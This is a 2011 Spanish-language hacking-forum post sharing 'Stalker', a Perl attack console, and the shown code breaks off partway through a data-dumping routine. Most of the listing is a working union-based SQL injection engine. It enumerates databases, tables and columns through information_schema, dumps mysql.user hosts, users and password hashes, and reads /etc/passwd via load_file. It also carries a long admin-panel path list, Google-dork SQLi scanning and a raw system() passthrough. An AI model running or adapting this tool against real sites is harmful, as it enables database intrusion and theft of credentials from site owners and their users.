elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Perl] Stalker By Doddy H
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Perl] Stalker By Doddy H  (Leído 3,145 veces)
BigBear


Desconectado Desconectado

Mensajes: 545



Ver Perfil
[Perl] Stalker By Doddy H
« en: 7 Octubre 2011, 15:56 pm »

Bueno aca les traigo un programa que eh estado
haciendo esta ultima semana

Se llama stalker , sirve como consola en caso de que cmd.exe no este
disponible y tiene las siguiente funciones

  • Mostrar IP de servidor especifico
  • Capturar todos los links de una pagina
  • Recibir procesos de nuestra maquina
  • Cerrar el proceso que nos moleste
  • Conectar a un servidor y mostrar respuesta
  • Capturar metodos HTTP de un servidor web
  • Verificar listado de directorios en una pagina
  • Codificacion y decodificacion de hex/ascii/base64
  • Escanear puertos de una IP
  • Buscar panel de administracion
  • Crackear hash md5 mediante webs
  • Buscar en google paginas vulnerables a SQLI
  • Cliente FTP
  • Navegador por nuestros archivos y directorios
  • Y ejecutar comandos
Código
  1. #!usr/bin/perl
  2. #Project STALKER (C) Doddy Hackman 2011
  3. #
  4. #ppm install http://www.bribes.org/perl/ppm/DBI.ppd
  5. #ppm install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd
  6. #
  7. #You need download this http://search.cpan.org/~animator/Color-Output-1.05/Output.pm
  8. #
  9.  
  10. use IO::Socket;
  11. use HTML::LinkExtor;
  12. use LWP::UserAgent;
  13. use Win32::OLE qw(in);
  14. use Win32::Process;
  15. use Net::FTP;
  16. use Cwd;
  17. use URI::Split qw(uri_split);
  18. use MIME::Base64;
  19. use DBI;
  20. use Color::Output;
  21. Color::Output::Init
  22.  
  23. @panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
  24. ,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
  25. ,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
  26. ,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
  27. ,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
  28. ,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
  29. ,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
  30. ,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
  31. ,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
  32. ,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
  33. ,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
  34. ,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
  35. ,'administration/','administration/index.php','administration/login.php'
  36. ,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
  37. ,'system/login.php','admin.php','login.php','administrador.php','administration.php'
  38. ,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
  39. ,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
  40. ,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
  41. ,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
  42. ,'administrator/','administrator/index.html','administrator/login.html'
  43. ,'administrator/account.html','administrator/account.php','administrator.html','login.html'
  44. ,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
  45. ,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
  46. ,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
  47. ,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
  48. ,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
  49. ,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
  50. ,'administrator/login.asp','administrator/account.asp','administrator.asp'
  51. ,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
  52. ,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
  53. ,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
  54. ,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
  55. ,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
  56. ,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
  57. ,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
  58. ,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
  59. ,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
  60. ,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
  61. ,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
  62. ,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
  63. ,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/
  64. ','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/
  65. ','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/
  66. ','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/
  67. ','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
  68. ,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
  69. ,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
  70. ,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
  71. ,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
  72. ,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
  73. ,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
  74. ,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
  75. ,'server/','database_administration/','power_user/','system_administration/'
  76. ,'ss_vms_admin_sm/');
  77.  
  78.  
  79. unless (-d "/logs/webs") {
  80. mkdir("logs/",777);
  81. mkdir("logs/webs/",777);
  82. }
  83.  
  84. my $nave = LWP::UserAgent->new;
  85. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  86. $nave->timeout(5);
  87.  
  88. head();
  89.  
  90. getinfo();
  91.  
  92. $SIG{INT} = \&next;
  93.  
  94. while(1) {
  95. cprint "\x037"; #13
  96. menujo();
  97. cprint "\x030";
  98. }
  99.  
  100. sub getinfo {
  101. $so = $^O;
  102. $login = Win32::LoginName();
  103. $domain = Win32::DomainName();
  104. cprint "\x0313"; #13
  105. print "\n\n[SO] : $so [Login] : $login [Group] : $domain\n\n";
  106. cprint "\x030";
  107. }
  108.  
  109.  
  110. sub menujo {
  111. print "\n\n>";
  112. chomp (my $cmd = <stdin>);
  113. print "\n\n";
  114.  
  115. if ($cmd=~/getinfo/ig) {
  116. getinfo();
  117. }
  118. elsif ($cmd =~/getip (.*)/) {
  119. my $te = $1;
  120. if ($te eq "" or $te eq " ") {
  121. print "\n[+] sintax : getip <host>\n";
  122. }
  123. print "\n[IP] : ".getip($1)."\n";
  124. print "\n";
  125. }
  126.  
  127. elsif ($cmd =~/getlink (.*)/) {
  128. print "[+] Extracting links in the page\n\n\n";
  129. $code = toma($1);
  130. my @re = get_links($code);
  131. for my $url(@re) {
  132. chomp $url;
  133. print "[Link] : $url\n";
  134. }
  135. print "\n\n[+] Finish\n";
  136. }
  137.  
  138. elsif ($cmd=~/help/) {
  139. helpme();
  140. }
  141.  
  142. elsif ($cmd=~/getprocess/) {
  143. my %re = getprocess();
  144.  
  145.  
  146. for my $data(keys %re) {
  147. ($proceso,$pid) = ($t=~/(.*):(.*)/ig);
  148. print "[+] Proceso : ".$data."\n";
  149. print "[+] PID : ".$re{$data}."\n\n";
  150. }
  151. }
  152. elsif ($cmd=~/killprocess (.*) (.*)/) {
  153. if (killprocess($1,$2)) {
  154. print "[+] Process $1 closed";
  155. }
  156. }
  157. elsif ($cmd=~/conec (.*) (.*) (.*)/) {
  158. print conectar($1,$2,$3);
  159. }
  160. elsif ($cmd=~/allow (.*)/) {
  161. $re = conectar($1,"80","GET / HTTP/1.0\r\n");
  162. if ($re=~/Allow:(.*)/ig) {
  163. print "[+] Metodos : ".$1."\n";
  164. }}
  165. elsif ($cmd=~/paths (.*)/) {
  166. scanpaths($1);
  167. }
  168. elsif ($cmd=~/encodehex (.*)/) {
  169. print "\n\n[+] ".hex_en($1)."\n\n";
  170. }
  171. elsif ($cmd=~/decodehex (.*)/) {
  172. print "\n\n[+] ".hex_de($1)."\n\n";
  173. }
  174. elsif ($cmd=~/download (.*) (.*)/) {
  175. my $file,$name = $1,$2;
  176. if (download($1,$2)) {
  177. print "[+] File downloaded\n";
  178. }
  179. }
  180. elsif ($cmd=~/encodeascii (.*)/) {
  181. print "\n\n[+] ".ascii($1)."\n\n";
  182. }
  183. elsif ($cmd=~/decodeascii (.*)/) {
  184. print "\n\n[+] ".ascii_de($1)."\n\n";
  185. }
  186. elsif ($cmd=~/encodebase (.*)/) {
  187. print "\n\n[+] ".base($1)."\n\n";
  188. }
  189. elsif ($cmd=~/decodebase (.*)/) {
  190. print "\n\n[+] ".base_de($1)."\n\n";
  191. }
  192. elsif ($cmd=~/aboutme/) {
  193. aboutme();
  194. }
  195. elsif ($cmd=~/scanport (.*)/) {
  196. scanport($1);
  197. }
  198. elsif ($cmd=~/panel (.*)/) {
  199. scanpanel($1);
  200. }
  201. elsif ($cmd=~/scangoogle/) {
  202. print "[Dork] : ";
  203. chomp(my $dork = <stdin>);
  204. print "\n\n[Pages] : ";
  205. chomp(my $pages = <stdin>);
  206. print "\n\n[Starting the search]\n\n";
  207. my @links = google($dork,$pages);
  208. print "\n[Links Found] : ".int(@links)."\n\n\n";
  209. print "[Starting the scan]\n\n\n";
  210. for my $link(@links) {
  211. if ($link=~/(.*)=/ig) {
  212. my $web = $1;
  213. sql($web."=");
  214. }}
  215. print "\n\n[+] Finish\n";
  216. }
  217. elsif ($cmd=~/getpass (.*)/) {
  218. crackit($1);
  219. }
  220. elsif ($cmd=~/ftp (.*) (.*) (.*)/) {
  221. ftp($1,$2,$3);
  222. }
  223. elsif ($cmd=~/navegator/) {
  224. nave:
  225. print getcwd().">";
  226. chomp(my $rta = <stdin>);
  227. print "\n\n";
  228. if ($rta=~/list/) {
  229. my @files = coleccionar(getcwd());
  230. for(@files) {
  231. if (-f $_) {
  232. print "[File] : ".$_."\n";
  233. } else {
  234. print "[Directory] : ".$_."\n";
  235. }}}
  236. if ($rta=~/cd (.*)/) {
  237. my $dir = $1;
  238. if (chdir($dir)) {
  239. print "\n[+] Directory changed\n";
  240. } else {
  241. print "\n[-] Error\n";
  242. }}
  243. if ($rta=~/del (.*)/) {
  244. my $file = getcwd()."/".$1;
  245. if (-f $file) {
  246. if (unlink($file)) {
  247. print "\n[+] File Deleted\n";
  248. } else {
  249. print "\n[-] Error\n";
  250. }
  251. } else {
  252. if (rmdir($file)) {
  253. print "\n[+] Directory Deleted\n";
  254. } else {
  255. print "\n[-] Error\n";
  256. }}}
  257. if ($rta=~/rename (.*) (.*)/) {
  258. if (rename(getcwd()."/".$1,getcwd()."/".$2)) {
  259. print "\n[+] File Changed\n";
  260. } else {
  261. print "\n[-] Error\n";
  262. }}
  263. if ($rta=~/open (.*)/) {
  264. my $file = $1;
  265. chomp $file;
  266. system($file);
  267. #system(getcwd()."/".$file);
  268. }
  269. if ($rta=~/help/) {
  270. print "\nCommands : help cd list del rename open exit\n\n";
  271. }
  272. if ($rta=~/exit/) {
  273. next;
  274. }
  275. print "\n\n";
  276. goto nave;
  277. }
  278. elsif ($cmd=~/kobra (.*)/) {
  279. my $url = $1;
  280. chomp $url;
  281. scansqli($url,"--");
  282. }
  283. elsif ($cmd=~/mysql (.*) (.*) (.*)/) {
  284. enter($1,$2,$3);
  285. }
  286. elsif ($cmd=~/exit/) {
  287. copyright();
  288. <stdin>;
  289. exit(1);
  290. }
  291. else {
  292. system($cmd);
  293. }
  294. #print "\n\n";
  295. }
  296.  
  297.  
  298. sub scansqli {
  299. print "[Status] : Scanning.....\n";
  300. $pass = &bypass($_[1]);
  301. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  302. my $save = $auth;
  303. if ($_[0]=~/hackman/ig) {
  304. savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
  305. &menu_options($_[0],$pass,$save);
  306. }
  307. my ($gen,$save,$control) = &length($_[0],$_[1]);
  308. if ($control eq 1) {
  309. print "[Status] : Enjoy the menu\n\n";
  310. &menu_options($gen,$pass,$save);
  311. } else {
  312. print $control;
  313. print "[Status] : Length columns not found\n\n";
  314. menujo();
  315. }
  316. }
  317.  
  318. sub length {
  319. my $rows  = "0";
  320. my $asc;
  321. my $page = $_[0];
  322. ($pass1,$pass2) = &bypass($_[1]);
  323. $inyection = $page.$pass1."and".$pass1."1=0".$pass1."order".$pass1."by".$pass1."9999999999".$pass2;
  324. $code = toma($inyection);
  325. if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/unknown column/ig || $code=~/Call to undefined function/ig) {
  326. my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2);
  327. my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2);
  328. unless ($testar1 eq $testar2) {
  329. my $patha = $1;
  330. chomp $patha;
  331. $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
  332. $total = "1";
  333. for my $rows(2..200) {
  334. $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
  335. $total.= ",".$rows;
  336. $injection = $page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
  337. $test = toma($injection);
  338. if ($test=~/RATSXPDOWN/) {
  339. @number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
  340. $control = 1;
  341. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  342. my $save = $auth;
  343. savefile($save.".txt","\n[Target confirmed] : $page");
  344. savefile($save.".txt","[Bypass] : $_[1]\n");
  345. savefile($save.".txt","[Limit] : The site has $rows columns");
  346. savefile($save.".txt","[Data] : The number @number print data");
  347. if ($patha) {
  348. savefile($save.".txt","[Full Path Discloure] : $patha");
  349. }
  350. $total=~s/$number[0]/hackman/;
  351. savefile($save.".txt","[SQLI] : ".$page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
  352. return($page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
  353. }}}}}
  354.  
  355.  
  356. sub details {
  357. my ($page,$bypass,$save) = @_;
  358. ($pass1,$pass2) = &bypass($bypass);
  359. savefile($save.".txt","\n");
  360. if ($page=~/(.*)hackman(.*)/ig) {
  361. print "\n\n[+] Searching information..\n\n";
  362. my  ($start,$end) = ($1,$2);
  363. $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
  364. $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
  365. $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  366. $test1 = toma($inforschema);
  367. $test2 = toma($mysqluser);
  368. if ($test2=~/ERTOR854/ig) {
  369. savefile($save.".txt","[mysql.user] : ON");
  370. print "[mysql.user] : ON\n";
  371. } else {
  372. print "[mysql.user] : OFF\n";
  373. savefile($save.".txt","[mysql.user] : OFF");
  374. }
  375. if ($test1=~/ERTOR854/ig) {
  376. print "[information_schema.tables] : ON\n";
  377. savefile($save.".txt","[information_schema.tables] : ON");
  378. } else {
  379. print "[information_schema.tables] : OFF\n";
  380. savefile($save.".txt","[information_schema.tables] : OFF");
  381. }
  382. if ($test3=~/ERTOR854/ig) {
  383. print "[+] load_file permite ver los archivos\n";
  384. savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  385. }
  386. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
  387. $injection = $start.$concat.$end.$pass2;
  388. $code = toma($injection);
  389. if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
  390. print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
  391. savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
  392. } else {
  393. print "\n[-] Not found any data\n";
  394. }}}
  395.  
  396.  
  397. sub menu_options {
  398.  
  399. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  400. my $save = $auth;
  401. print "\n/logs/webs/$save>";
  402. chomp (my $rta = <stdin>);
  403.  
  404. if ($rta=~/help/) {
  405.  
  406. commands : details tables columns dbs othertable othercolumn
  407.           mysqluser dumper logs exit
  408.  
  409. );
  410. }
  411.  
  412.  
  413. if ($rta =~/tables/) {
  414. schematables($_[0],$_[1],$save);
  415. &reload;
  416. }
  417. elsif ($rta =~/columns (.*)/) {
  418. my $tabla = $1;
  419. schemacolumns($_[0],$_[1],$save,$tabla);
  420. &reload;
  421. }
  422. elsif ($rta =~/dbs/) {
  423. &schemadb($_[0],$_[1],$save);
  424. &reload;
  425. }
  426. elsif ($rta =~/othertable (.*)/) {
  427. my $data = $1;
  428. &schematablesdb($_[0],$_[1],$data,$save);
  429. &reload;
  430. }
  431. elsif ($rta =~/othercolumn (.*) (.*)/){
  432. my ($db,$table) = ($1,$2);
  433. &schemacolumnsdb($_[0],$_[1],$db,$table,$save);
  434. &reload;
  435. }
  436. elsif ($rta =~/mysqluser/) {
  437. &mysqluser($_[0],$_[1],$save);
  438. &reload;
  439. }
  440. elsif ($rta=~/logs/) {
  441. $t = "logs/webs/$save.txt";
  442. system("start $t");
  443. &reload;
  444. }
  445. elsif ($rta=~/exit/) {
  446. next;
  447. }
  448.  
  449. elsif ($rta=~/dumper (.*) (.*) (.*)/) {
  450. my ($tabla,$col1,$col2) = ($1,$2,$3);
  451. &dump($_[0],$col1,$col2,$tabla,$_[1],$save);
  452. &reload;
  453. }
  454. elsif ($rta =~/details/) {
  455. &details($_[0],$_[1],$save);
  456. &reload;
  457. }
  458. else {
  459. &reload;
  460. }
  461. }
  462.  
  463.  
  464.  
  465. sub schematables {
  466. $real = "1";
  467. my ($page,$bypass,$save) = @_;
  468. savefile($save.".txt","\n");
  469. print "\n";
  470. my $page1 = $page;
  471. ($pass1,$pass2) = &bypass($_[1]);
  472. savefile($save.".txt","[DB] : default");
  473. print "\n[+] Searching tables with schema\n\n";
  474. $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  475. $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  476. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
  477. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  478. my $resto = $1;
  479. $total = $resto - 17;
  480. print "[+] Tables Length :  $total\n\n";
  481. savefile($save.".txt","[+] Searching tables with schema\n");
  482. savefile($save.".txt","[+] Tables Length :  $total\n");
  483. my $limit = $1;
  484. for my $limit(17..$limit) {
  485. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
  486. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  487. my $table = $1;
  488. chomp $table;
  489. print "[Table $real Found : $table ]\n";
  490. savefile($save.".txt","[Table $real Found : $table ]");
  491. $real++;
  492. }}
  493. print "\n";
  494. } else {
  495. print "\n[-] information_schema = ERROR\n";
  496. }
  497. }
  498.  
  499. sub reload {
  500. &menu_options($_[0]);
  501. }
  502.  
  503.  
  504. sub schemacolumns {
  505. my ($page,$bypass,$save,$table) = @_;
  506. my $page3 = $page;
  507. my $page4 = $page;
  508. savefile($save.".txt","\n");
  509. print "\n";
  510. ($pass1,$pass2) = &bypass($bypass);
  511. print "\n[DB] : default\n";
  512. savefile($save.".txt","[DB] : default");
  513. savefile($save.".txt","[Table] : $table\n");
  514. $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  515. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
  516. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  517. print "\n[Columns Length : $1 ]\n\n";
  518. savefile($save.".txt","[Columns Length : $1 ]\n");
  519. my $si = $1;
  520. chomp $si;
  521. $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  522. $real = "1";
  523. for my $limit2(0..$si) {
  524. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
  525. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  526. print "[Column $real] : $1\n";
  527. savefile($save.".txt","[Column $real] : $1");
  528. $real++;
  529. }}
  530. print "\n";
  531. } else {
  532. print "\n[-] information_schema = ERROR\n";
  533. }}
  534.  
  535. sub schemadb {
  536. my ($page,$bypass,$save) = @_;
  537. my $page1 = $page;
  538. savefile($save.".txt","\n");
  539. print "\n\n[+] Searching DBS\n\n";
  540. ($pass1,$pass2) = &bypass($bypass);
  541. $page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  542. $code = toma($page.$pass1."from".$pass1."information_schema.schemata");
  543. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  544. my $limita = $1;
  545. print "[+] Databases Length : $limita\n\n";
  546. savefile($save.".txt","[+] Databases Length : $limita\n");
  547. $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  548. $real = "1";
  549. for my $limit(0..$limita) {
  550. $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
  551. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  552. my $control = $1;
  553. if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
  554. print "[Database $real Found] $control\n";
  555. savefile($save.".txt","[Database $real Found] : $control");
  556. $real++;
  557. }
  558. }
  559. }
  560. print "\n";
  561. } else {
  562. print "[-] information_schema = ERROR\n";
  563. }
  564. }
  565.  
  566. sub schematablesdb {
  567. my $page = $_[0];
  568. my $db = $_[2];
  569. my $page1 = $page;
  570. savefile($_[3].".txt","\n");
  571. print "\n\n[+] Searching tables with DB $db\n\n";
  572. ($pass1,$pass2) = &bypass($_[1]);
  573. savefile($_[3].".txt","[DB] : $db");
  574. $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  575. $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  576. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
  577. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
  578. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {  
  579. print "[+] Tables Length :  $1\n\n";
  580. savefile($_[3].".txt","[+] Tables Length :  $1\n");
  581. my $limit = $1;
  582. $real = "1";
  583. for my $lim(0..$limit) {
  584. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
  585. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
  586. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  587. my $table = $1;
  588. chomp $table;
  589. savefile($_[3].".txt","[Table $real Found : $table ]");
  590. print "[Table $real Found : $table ]\n";
  591. $real++;
  592. }}
  593. print "\n";
  594. } else {
  595. print "\n[-] information_schema = ERROR\n";
  596. }}
  597.  
  598. sub schemacolumnsdb {
  599. my ($page,$bypass,$db,$table,$save) = @_;
  600. my $page3 = $page;
  601. my $page4 = $page;
  602. print "\n\n[+] Searching columns in table $table with DB $db\n\n";
  603. savefile($save.".txt","\n");
  604. ($pass1,$pass2) = &bypass($_[1]);
  605. savefile($save.".txt","\n[DB] : $db");
  606. savefile($save.".txt","[Table] : $table");
  607. $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  608. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
  609. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  610. print "\n[Columns length : $1 ]\n\n";
  611. savefile($save.".txt","[Columns length : $1 ]\n");
  612. my $si = $1;
  613. chomp $si;
  614. $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  615. $real = "1";
  616. for my $limit2(0..$si) {
  617. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
  618. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  619. print "[Column $real] : $1\n";
  620. savefile($save.".txt","[Column $real] : $1");
  621. $real++;
  622. }
  623. }
  624. } else {
  625. print "\n[-] information_schema = ERROR\n";
  626. }
  627. print "\n";
  628. }
  629.  
  630. sub mysqluser {
  631. my ($page,$bypass,$save) = @_;
  632. my $cop = $page;
  633. my $cop1 = $page;
  634. savefile($save.".txt","\n");
  635. print "\n\n[+] Finding mysql.users\n";
  636. ($pass1,$pass2) = &bypass($bypass);
  637. $page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
  638. $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
  639. if ($code=~/RATSXPDOWN/ig){
  640. $cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  641. $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
  642. if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  643. print "\n[+] Users Found : $1\n\n";
  644. savefile($save.".txt","\n[+] Users mysql Found : $1\n");
  645. for my $limit(0..$1) {
  646. $cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
  647. $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
  648. if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
  649. print "[Host] : $1 [User] : $2 [Password] : $3\n";
  650. savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
  651. } else {
  652. print "\n";
  653. &reload;
  654. }
  655. }
  656. }
  657. } else {
  658. print "\n[-] mysql.user = ERROR\n\n";
  659. }
  660. }
  661.  
  662. sub dump {
  663. savefile($_[5].".txt","\n");
  664. my $page = $_[0];
  665. ($pass1,$pass2) = &bypass($_[4]);
  666. if ($page=~/(.*)hackman(.*)/){
  667. my $start = $1;
  668. my $end = $2;
  669. print "\n\n[+] Extracting values...\n\n";
  670. $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
  671. $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
